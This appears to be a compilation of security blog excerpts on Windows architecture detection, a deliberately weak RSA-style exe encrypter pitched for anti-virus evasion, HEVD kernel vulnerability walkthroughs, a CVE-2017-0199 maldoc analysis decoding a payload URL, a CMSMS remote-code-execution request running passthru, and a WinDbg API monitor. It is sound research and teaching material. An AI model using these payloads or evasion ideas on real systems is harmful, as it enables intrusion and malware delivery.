Detecting Architecture in Windows

After a while, I thought of posting something interesting I noticed. Some of you know the old method of detecting the architecture using the CS segment register, which was also used in the Kronos malware. It works because Windows loads CS with selector 0x1B for a 32-bit process on native 32-bit Windows but with 0x23 for a 32-bit process running under WOW64, so shifting the selector right by 5 leaves 0 in the first case and 1 in the second:

xor   eax,eax
mov   ax,cs        ; 0x1B on native 32-bit Windows, 0x23 for a 32-bit process under WOW64
shr   eax,5        ; eax = 0 -> 32-bit OS, eax = 1 -> 64-bit OS


I had a look at the segment registers last night and found that the ES, GS and FS segment registers can be used to detect the architecture as well. For a 32-bit process, ES holds 0x23 on native 32-bit Windows and 0x2B under WOW64; the two values differ only in bit 3, which is what the rotate-and-mask below isolates.

Using ES

; Author : @OsandaMalith
main:
xor eax,eax
mov ax,es           ; 0x23 on native 32-bit Windows, 0x2B under WOW64
ror ax, 0x3         ; bit 3 of the selector becomes bit 0
and eax,0x1         ; keep only that bit
test eax, eax
je thirtytwo        ; 0 -> native 32-bit, 1 -> 64-bit (WOW64)
invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
jmp exit

thirtytwo:
invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION

exit:
invoke ExitProcess, 0
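To see why both tricks work, here is an added C example (not code from the post or from Kronos) that decodes the selector values involved. The selector values 0x1B/0x23/0x2B are the ones Windows assigns to a 32-bit process and are assumed here rather than read live; the optional live read only compiles for a 32-bit Windows build with GCC/MinGW.

```c
#include <stdint.h>
#include <stdio.h>

/* x86 segment selector: bits 15..3 = descriptor index, bit 2 = table
 * indicator (0 = GDT, 1 = LDT), bits 1..0 = requested privilege level. */
typedef struct {
    unsigned index;
    unsigned ti;
    unsigned rpl;
} selector_t;

static selector_t decode_selector(uint16_t sel)
{
    selector_t s;
    s.index = sel >> 3;
    s.ti = (sel >> 2) & 1;
    s.rpl = sel & 3;
    return s;
}

/* The Kronos-style CS check: 'shr eax,5' is 0 for CS = 0x1B (32-bit process
 * on native 32-bit Windows) and 1 for CS = 0x23 (32-bit process under WOW64). */
static unsigned wow64_from_cs(uint16_t cs)
{
    return cs >> 5;
}

/* The ES check from the post: 'ror ax,3 ; and eax,1' keeps bit 3 of the
 * selector, the low bit of the GDT index: ES = 0x23 (index 4) gives 0,
 * ES = 0x2B (index 5) gives 1. */
static unsigned wow64_from_es(uint16_t es)
{
    return (es >> 3) & 1;
}

#if defined(_WIN32) && defined(__i386__)
/* Live read of the selectors; only meaningful in a 32-bit Windows process
 * (GCC/MinGW inline assembly syntax). */
static uint16_t read_cs(void)
{
    uint16_t v;
    __asm__ volatile ("mov %%cs, %0" : "=r" (v));
    return v;
}
static uint16_t read_es(void)
{
    uint16_t v;
    __asm__ volatile ("mov %%es, %0" : "=r" (v));
    return v;
}
#endif

static void show(const char *label, uint16_t cs, uint16_t es)
{
    selector_t c = decode_selector(cs), e = decode_selector(es);
    printf("%s: CS=0x%02X (index %u, RPL %u) ES=0x%02X (index %u, RPL %u) "
           "-> cs>>5 = %u, es bit3 = %u\n",
           label, (unsigned)cs, c.index, c.rpl, (unsigned)es, e.index, e.rpl,
           wow64_from_cs(cs), wow64_from_es(es));
}

int main(void)
{
    /* Selector values Windows assigns to a 32-bit process; these are the
     * values the two tricks in the post rely on (assumed, not read live). */
    show("native 32-bit Windows", 0x1B, 0x23);
    show("32-bit process under WOW64", 0x23, 0x2B);
#if defined(_WIN32) && defined(__i386__)
    show("this process", read_cs(), read_es());
#endif
    return 0;
}
```

Both checks test Windows' fixed GDT layout rather than anything architectural, so they only tell a 32-bit process whether it is running under WOW64; they are not a general CPU-mode test.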



A Basic RSA Encrypter

This is a small post about implementing a basic RSA-style encrypter to encrypt sections of an exe. We can use this to exchange exes with people: the section is encrypted with the recipient's public key, and the recipient has to use their private key to decrypt the exe. The same idea can be applied to evading anti-viruses.

I will use multiplication instead of exponentiation, since it is easy to implement in a few lines of assembly. However, this makes recovering the private key trivial, so the complete scheme is broken.

$Enc = (m*e) \text{ mod } N$

$Dec = (c*d) \text{ mod } N$

The correctness of this scheme depends on choosing $e$ and $d$ with $e*d \equiv 1 \pmod N$ (which requires $\gcd(e, N) = 1$), so that

$Dec(Enc(m)) = (m*e*d) \text{ mod } N = m \text{ mod } N$
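Why the multiplicative scheme is broken, worked through with the post's symbols (an added derivation, not part of the original post; the numbers are chosen for illustration). Because $e*d \equiv 1 \pmod N$ is a congruence modulo $N$ itself rather than modulo $\varphi(N)$, the private key is just the modular inverse of the public exponent, which anyone holding $(e, N)$ computes with the extended Euclidean algorithm:

$d = e^{-1} \text{ mod } N$

Take $N = 3233$ and $e = 17$. Extended Euclid on $(3233, 17)$ gives $3233 = 17*190 + 3$, $17 = 3*5 + 2$, $3 = 2*1 + 1$, hence

$1 = 6*3233 - 1141*17 \Rightarrow d = (-1141) \text{ mod } 3233 = 2092$

Check: $17*2092 = 35564 = 11*3233 + 1$. Encrypting $m = 65$ gives

$c = (65*17) \text{ mod } 3233 = 1105$

and an attacker holding only $c$ and the public key recovers

$m = (c*d) \text{ mod } N = (1105*2092) \text{ mod } 3233 = 65$

For comparison, real RSA with the same $N$ and $e$ needs $d = e^{-1} \text{ mod } \varphi(N) = 17^{-1} \text{ mod } 3120 = 2753$, and computing $\varphi(N) = 60*52$ requires factoring $N$. The multiplicative variant never involves $\varphi(N)$, so it has no secret at all.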

eLearnSecurity Courses

With the competitiveness of the infosec industry, security training is definitely needed. Let me share my story. Back in 2013 I heard about eLearnSecurity. Those days the only courses were Penetration Testing Professional and Penetration Testing Student. But I didn't have enough money to sign up since I was 16 years old. With the pocket money I had, I signed up for the Penetration Testing Student course since I was curious about the material. I was amazed by their teaching techniques. Everything was so clearly written. After that I had to enter university and I had no time to concentrate on the things I like to do. Gradually eLearnSecurity started developing specialized courses, starting from Web Application Penetration Testing, and next came the Extreme edition of it. Meanwhile, they launched a course on reverse engineering too, which really surprised me, since it was the first course on reverse engineering I had ever seen.
(more…)

Windows Kernel Exploitation – Null Pointer Dereference

Today I'm sharing how to exploit the null pointer dereference vulnerability present in the HackSysExtreme Vulnerable Driver.

The Vulnerability

You can view the source from here.

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
    ULONG UserValue = 0;
    NTSTATUS Status = STATUS_SUCCESS;
    PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer,
                     sizeof(NULL_POINTER_DEREFERENCE),
                     (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

        // Allocate Pool chunk
        NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
            ExAllocatePoolWithTag(NonPagedPool,
                                  sizeof(NULL_POINTER_DEREFERENCE),
                                  (ULONG)POOL_TAG);

        if (!NullPointerDereference) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
        }

        // Get the value from user mode
        UserValue = *(PULONG)UserBuffer;

        DbgPrint("[+] UserValue: 0x%p\n", UserValue);
        DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

        // Validate the magic value
        if (UserValue == MagicValue) {
            NullPointerDereference->Value = UserValue;
            NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

            DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
            DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
        }
        else {
            DbgPrint("[+] Freeing NullPointerDereference Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

            // Free the allocated Pool chunk
            ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer
            NullPointerDereference = NULL;
        }

#ifdef SECURE
        // Secure Note: This is secure because the developer is checking if
        // 'NullPointerDereference' is not NULL before calling the callback function
        if (NullPointerDereference) {
            NullPointerDereference->Callback();
        }
#else
        DbgPrint("[+] Triggering Null Pointer Dereference\n");

        // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
        // because the developer is not validating if 'NullPointerDereference' is NULL
        // before calling the callback function
        NullPointerDereference->Callback();
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}


As usual, everything is clearly explained in the source. At line 42 of the driver source, 'UserValue' is compared with the magic value '0xBAD0B0B0'; if the comparison fails, the pool chunk is freed and at line 58 'NullPointerDereference' is set to NULL, and at line 73 'NullPointerDereference->Callback()' is called without validating whether the pointer is NULL.

Let's disassemble and see it closely. As you can see, if the provided 'MagicValue' is wrong, the value of 'NullPointerDereference' is set to NULL to avoid a dangling pointer.
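To make the control flow concrete, here is an added user-mode C model of the handler (example code, not HEVD's own). It keeps the object layout and the magic value 0xBAD0B0B0 from the post, and the NTSTATUS codes are the real Windows values; everything else, including the 'secure' switch that stands in for the #ifdef SECURE build and the fact that the model reports STATUS_ACCESS_VIOLATION instead of actually faulting on the NULL call, is an assumption of the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Object layout from the driver: a ULONG followed by the callback pointer. */
typedef void (*FunctionPointer)(void);
typedef struct _NULL_POINTER_DEREFERENCE {
    uint32_t        Value;
    FunctionPointer Callback;
} NULL_POINTER_DEREFERENCE, *PNULL_POINTER_DEREFERENCE;

#define MagicValue              0xBAD0B0B0u   /* value the post quotes */
#define STATUS_SUCCESS          0x00000000u
#define STATUS_NO_MEMORY        0xC0000017u
#define STATUS_ACCESS_VIOLATION 0xC0000005u

static int g_callback_ran;
static void NullPointerDereferenceObjectCallback(void) { g_callback_ran = 1; }

/* The address 'NullPointerDereference->Callback' is loaded from when the
 * object pointer is NULL: 0 + offsetof(Callback), i.e. 4 on x86 and 8 on
 * x64. That slot is what decides where the unchecked call goes. */
static uintptr_t null_callback_slot(void)
{
    return (uintptr_t)offsetof(NULL_POINTER_DEREFERENCE, Callback);
}

/* User-mode model of TriggerNullPointerDereference. 'secure' selects the
 * #ifdef SECURE branch. The driver would fault on the NULL call (or execute
 * whatever sits at the slot above if that page were mapped); the model
 * returns the STATUS_ACCESS_VIOLATION the __except handler would report. */
static uint32_t trigger_null_pointer_dereference(uint32_t user_value, int secure)
{
    PNULL_POINTER_DEREFERENCE obj = malloc(sizeof *obj);
    uint32_t status = STATUS_SUCCESS;

    g_callback_ran = 0;
    if (!obj)
        return STATUS_NO_MEMORY;

    if (user_value == MagicValue) {
        obj->Value = user_value;
        obj->Callback = NullPointerDereferenceObjectCallback;
    } else {
        free(obj);
        obj = NULL;                    /* "Set to NULL to avoid dangling pointer" */
    }

    if (secure) {
        if (obj)                       /* the check the SECURE build adds */
            obj->Callback();
    } else if (obj) {
        obj->Callback();
    } else {
        /* Unchecked build: would execute *(FunctionPointer *)null_callback_slot() */
        status = STATUS_ACCESS_VIOLATION;
    }

    free(obj);                         /* free(NULL) is a no-op */
    return status;
}

/* Reports whether the callback ran on the most recent trigger. */
static int callback_ran(void) { return g_callback_ran; }

int main(void)
{
    printf("callback slot when the object pointer is NULL: 0x%lx\n",
           (unsigned long)null_callback_slot());
    printf("good magic, unchecked:  0x%08X callback_ran=%d\n",
           trigger_null_pointer_dereference(MagicValue, 0), callback_ran());
    printf("bad magic, unchecked:   0x%08X callback_ran=%d\n",
           trigger_null_pointer_dereference(0x41414141u, 0), callback_ran());
    printf("bad magic, SECURE:      0x%08X callback_ran=%d\n",
           trigger_null_pointer_dereference(0x41414141u, 1), callback_ran());
    return 0;
}
```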
(more…)

Windows Kernel Exploitation – Arbitrary Overwrite

Today I'm sharing what I learned while developing an exploit for the arbitrary overwrite vulnerability present in the HackSysExtreme Vulnerable Driver, also known as a 'write-what-where' vulnerability. You can refer to my previous post on exploiting the stack overflow vulnerability and the analysis of the shellcode.

The Vulnerability

You can check the source from here

NTSTATUS TriggerArbitraryOverwrite(IN PWRITE_WHAT_WHERE UserWriteWhatWhere) {
    PULONG What = NULL;
    PULONG Where = NULL;
    NTSTATUS Status = STATUS_SUCCESS;

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserWriteWhatWhere,
                     sizeof(WRITE_WHAT_WHERE),
                     (ULONG)__alignof(WRITE_WHAT_WHERE));

        What = UserWriteWhatWhere->What;
        Where = UserWriteWhatWhere->Where;

        DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserWriteWhatWhere);
        DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
        DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", What);
        DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", Where);

#ifdef SECURE
        // Secure Note: This is secure because the developer is properly validating if address
        // pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()
        // routine before performing the write operation
        ProbeForRead((PVOID)Where, sizeof(PULONG), (ULONG)__alignof(PULONG));
        ProbeForRead((PVOID)What, sizeof(PULONG), (ULONG)__alignof(PULONG));

        *(Where) = *(What);
#else
        DbgPrint("[+] Triggering Arbitrary Overwrite\n");

        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        *(Where) = *(What);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}


Everything is well explained in the source code. Basically, the 'Where' and 'What' pointers are not validated as residing in userland, so we can overwrite an arbitrary kernel address with an arbitrary value.
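What "validating that the pointers reside in user mode" actually checks is worth seeing in code. The following is an added user-mode C model of the handler (example code, not HEVD's own) with the probe reimplemented as an address-range and alignment test. The MmUserProbeAddress values are the documented 32-bit and 64-bit Windows constants; the probe is an approximation of ProbeForRead/ProbeForWrite (it returns the NTSTATUS the kernel routines would raise instead of raising it), the 'secure' switch stands in for the #ifdef SECURE build, and the sample What/Where buffers are constructed globals assumed to sit below MmUserProbeAddress.

```c
#include <stdint.h>
#include <stdio.h>

typedef struct _WRITE_WHAT_WHERE {
    uint32_t *What;    /* user pointer to the value to write */
    uint32_t *Where;   /* user pointer to the destination */
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

/* Highest user-mode address (+1) that the probe accepts: MmUserProbeAddress. */
#if UINTPTR_MAX > 0xFFFFFFFFu
#define MM_USER_PROBE_ADDRESS ((uintptr_t)0x7FFFFFFF0000ull)   /* x64 */
#else
#define MM_USER_PROBE_ADDRESS ((uintptr_t)0x7FFF0000u)          /* x86 */
#endif

/* Approximation of ProbeForRead/ProbeForWrite: a non-empty range must be
 * aligned and must lie entirely below MmUserProbeAddress (overflow included).
 * The kernel routines raise an exception; the NTSTATUS the __except block
 * would then see is returned here instead. */
static uint32_t probe_user_range(const void *address, size_t length, size_t alignment)
{
    uintptr_t start = (uintptr_t)address;

    if (length == 0)
        return STATUS_SUCCESS;
    if (start & (alignment - 1))
        return STATUS_DATATYPE_MISALIGNMENT;
    if (start + length < start || start + length > MM_USER_PROBE_ADDRESS)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* User-mode model of TriggerArbitraryOverwrite; 'secure' selects the probed
 * branch. Without the probes, Where may point anywhere, which in the driver
 * means any kernel address. The model probes the 4-byte slot it writes. */
static uint32_t trigger_arbitrary_overwrite(PWRITE_WHAT_WHERE req, int secure)
{
    uint32_t *what = req->What;
    uint32_t *where = req->Where;

    if (secure) {
        uint32_t st = probe_user_range(what, sizeof *what, sizeof *what);
        if (st != STATUS_SUCCESS)
            return st;
        st = probe_user_range(where, sizeof *where, sizeof *where);
        if (st != STATUS_SUCCESS)
            return st;
    }
    *where = *what;    /* the write-what-where primitive */
    return STATUS_SUCCESS;
}

/* A destination above MmUserProbeAddress, i.e. what a kernel pointer looks
 * like to the probe. Never dereferenced in this model. */
static uint32_t *kernel_like_address(void)
{
    return (uint32_t *)(MM_USER_PROBE_ADDRESS + 0x1000);
}

/* Constructed sample "user" memory (assumed to sit below MmUserProbeAddress). */
static uint32_t g_what = 0x41414141u;
static uint32_t g_where = 0;

static uint32_t current_where(void) { return g_where; }

int main(void)
{
    WRITE_WHAT_WHERE req = { &g_what, &g_where };

    printf("probed write to a user address:  0x%08X, *Where = 0x%08X\n",
           trigger_arbitrary_overwrite(&req, 1), current_where());
    req.Where = kernel_like_address();
    printf("probed write to %p: 0x%08X (rejected, nothing written)\n",
           (void *)req.Where, trigger_arbitrary_overwrite(&req, 1));
    /* The unprobed branch with the same kernel-like Where is the bug itself:
     * in the driver it writes *What to that kernel address. Not run here. */
    return 0;
}
```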
(more…)

One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

b = '00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000'

# Python 2: drop the 00 bytes between the characters and hex-decode the rest
"".join("{0}".format((i+j).replace('00','').decode('hex')) for i, j in zip(b[::2], b[1::2]))



This exploit will deliver a malicious HTA file and execute it. HTA means the IE engine (mshta.exe), so yeah, the VBScript inside will execute nicely.
(more…)

Cryptculator

With the recent CTFs I've played, I thought of coding an app to calculate with big numbers easily, instead of programming it by hand each time. At times playing with big numbers is painful. I have written this in MASM32 and have used biglib for the big-number arithmetic.

CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user-defined tags, and dangerous PHP functions are not blacklisted in the tag code, so the tag body runs as arbitrary PHP.

POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 115
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1


Lab 13-02 Analysis

I felt bored and thought of having a look at this exe. These are my rough notes on this one.
Every 5 seconds the function at 401851 is called.

Basically, this malware takes screenshots, encrypts them and stores them in the current directory under names of the form 'temp%08x' % GetTickCount().

A Simple API Monitor

This is a simple WinDbg script to monitor common Win32 API calls and display the strings, IPs, ports and registry keys passed to them. The Win32 API is huge, so I have covered the common APIs used by programs and malware. I coded this for fun.

Usage: ApiMon.wds run; g;


You can remove APIs as you wish to minimize the output, or add any API you desire. Each entry is one breakpoint that runs the script with the API name and the argument to display; the general form is followed by the CreateFileA entry as a concrete case:

bp DLLName!APIName @"$$>a<${$arg0} APIName FileNamePtr"

bp kernelbase!CreateFileA @"$$>a<${$arg0} CreateFileA 1";


This is a sample output that uses CreateProcess API.

This is from running netcat.